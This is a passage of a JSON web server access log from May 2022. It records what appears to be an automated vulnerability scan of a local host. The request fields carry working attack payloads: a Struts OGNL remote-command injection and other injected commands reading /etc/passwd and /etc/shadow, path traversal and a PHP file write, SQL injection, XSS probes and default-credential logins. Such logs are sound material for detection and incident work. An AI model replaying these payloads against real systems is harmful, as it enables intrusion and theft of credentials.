/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.008","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/297Mdfsy2ATdn9xYt7aAB1Lr4ul.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/297Mdfsy2ATdn9xYt7aAB1Lr4ul.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 